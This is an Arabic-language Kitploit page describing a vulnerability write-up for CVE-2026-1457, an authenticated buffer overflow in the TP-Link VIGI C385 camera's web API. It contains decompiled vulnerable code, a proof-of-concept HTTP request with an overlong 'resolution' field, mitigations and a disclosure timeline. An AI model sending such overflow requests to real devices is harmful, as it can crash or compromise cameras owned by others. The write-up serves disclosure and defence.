Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1457 — يوفر تحليلاً مفصلاً وإثباتًا للمفهوم لثغرة CVE-2026-1457، وهي تجاوز سعة المخزن المؤقت المُصادق عليه في واجهة برمجة تطبيقات الويب الخاصة بـ TP-Link VIGI C385 مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/ii4gsp/cve-2026-1457
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعداستغلال الملفات الثنائية
GitHubii4gsp/cve-2026-1457

CVE-2026-1457

يوفر تحليلاً مفصلاً وإثباتًا للمفهوم لثغرة CVE-2026-1457، وهي تجاوز سعة المخزن المؤقت المُصادق عليه في واجهة برمجة تطبيقات الويب الخاصة بـ TP-Link VIGI C385 مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد.

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-1457: تنفيذ التعليمات البرمجية عن بُعد المُصادق عليه في TP-Link VIGI C385

نظرة عامة

CVE-2026-1457 هو ثغرة تجاوز سعة المخزن المؤقت المُصادق عليها في واجهة برمجة التطبيقات (API) الخاصة بكاميرا TP-Link VIGI C385 V1. تسمح هذه الثغرة للمهاجمين المُصادق عليهم بتنفيذ التعليمات البرمجية عن بُعد (RCE).

درجة CVSS v4.0: 8.5 (عالية)

CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

المنتجات المتأثرة

طراز المنتجالإصدار المتأثر
VIGI C385 V1
< 3.1.1 Build 251124 Rel.50371n

تفاصيل الثغرة

موقع الثغرة

تستخدم الدالة set_resolution_18AAD8 الدالة strcpy لنسخ إدخال المستخدم إلى مخزن مؤقت دون التحقق من الطول، مما يؤدي إلى تجاوز سعة المخزن المؤقت.

تحليل كود الثغرة

root@kitploit:~
int __fastcall set_resolution_18AAD8(int a1, char a2)
{
  const char *string_origin; // r5
  const char *v4; // r4
  int result; // r0
  char v6[72]; // [sp+0h] [bp-A0h] BYREF
  char v7[88]; // [sp+48h] [bp-58h] BYREF

  memset(v6, 0, sizeof(v6));
  memset(v7, 0, 72);
  string_origin = jso_obj_get_string_origin(a2, (char)"secname");
  v4 = jso_obj_get_string_origin(a2, (char)"resolution");
  sub_1FE6BC((int)"/video/main", (int)v6, 0x48u);
  sub_1FE6BC((int)"/video/minor", (int)v7, 0x44u);
  if ( !strcmp(string_origin, "main") )
  {
    result = strcmp(v4, &v6[29]);
    if ( result )                               // true if v4 is greater than &v6[29]
    {
      sub_1FE6BC((int)"/video/main", (int)v6, 0x48u);
      strcpy(&v6[29], v4);                      // ⚠️ buffer overflow
      sub_1FE804("/video/main", v6, 72);
      return 0;
    }
  }
  else if ( !strcmp(string_origin, "minor") )
  {
    result = strcmp(v4, &v7[29]);
    if ( result )
    {
      sub_1FE6BC((int)"/video/minor", (int)v7, 0x48u);
      strcpy(&v7[29], v4);                      // ⚠️ buffer overflow
      sub_1FE804("/video/minor", v7, 72);
      return 0;
    }
  }
  else
  {
    msg_debug(3, "http_do_setResolution", 3137, "[HTTPD]set resolution param error.\n");
    return -40209;
  }
  return result;
}

السبب الجذري

  1. تم تعريف المخزن المؤقت v6 بحجم 72 بايت، ولكن يتم تنفيذ strcpy عند الموضع &v6[29].
  2. تم تعريف المخزن المؤقت v7 بحجم 88 بايت، ولكن يتم تنفيذ strcpy عند الموضع &v7[29].
  3. لا يتم التحقق من طول إدخال المستخدم (v4) قبل استخدام strcpy، مما يسبب تجاوز سعة المخزن المؤقت.
  4. المساحة المتبقية في المخزن المؤقت هي 43 بايت فقط (v6) و59 بايت (v7) على التوالي، ولكن يمكن نسخ سلاسل أطول.

سيناريو الهجوم

المتطلبات

  • جلسة مُصادق عليها (مطلوب رمز stok صالح)
  • وصول إلى الشبكة (نفس الشبكة أو شبكة الإدارة)

ناقل الهجوم

يمكن للمهاجم استغلال وظيفة set_resolution في نقطة النهاية /ds لإرسال حمولات ضارة.

إثبات المفهوم

مثال على طلب HTTP

root@kitploit:~
POST /stok=9p73~f9L0fGs33wt3D3XDc)7u)!wt83f/ds HTTP/1.1
Host: 192.168.0.100
Content-Length: 3015
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Origin: https://192.168.0.100
Connection: close

{
  "video": {
    "set_resolution": {
      "secname": "main",
      "resolution": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    }
  },
  "method": "do"
}

نتيجة الاستغلال

لا تحتوي هذه الوثيقة على كود استغلال قابل للتنفيذ. توضح لقطة الشاشة التالية نجاح الاستغلال مما أدى إلى اتصال shell عكسي:

نجاح الـ Reverse Shell

التخفيف

الإجراءات الموصى بها

  1. تحديث البرنامج الثابت: قم بتحديث الأجهزة المتأثرة إلى الإصدار 3.1.1 Build 251124 Rel.50371n أو أحدث.

  2. عزل الشبكة: إذا أمكن، ضع أجهزة VIGI C385 في قطاع شبكة معزول.

  3. التحكم في الوصول: قصر الوصول إلى واجهة الإدارة على الشبكات الموثوقة فقط.

  4. المراقبة: راقب حركة المرور غير الطبيعية أو سلوك الجهاز غير المعتاد.

إجراءات التخفيف المؤقتة

  • حظر الوصول الخارجي إلى واجهة إدارة الويب.
  • استخدام بيانات اعتماد مصادقة قوية.
  • تعطيل خدمات الشبكة غير الضرورية.

الجدول الزمني

  • 2025-04-25: اكتشاف الثغرة
  • 2025-08-29: الإبلاغ عن الثغرة إلى TP-Link
  • 2026-01-29: نشر النشرة الأمنية
  • 2026-01-29: الكشف العام

المراجع

  • نشرة TP-Link الأمنية
  • CVE-2026-1457

الاعتمادات

تم اكتشاف وتحليل هذه الثغرة بواسطة:

  • SeonGoo Lee (classun9)
  • MinSeong Kim (ii4gsp)

من NSHC RedAlert Labs

تنزيل الأداة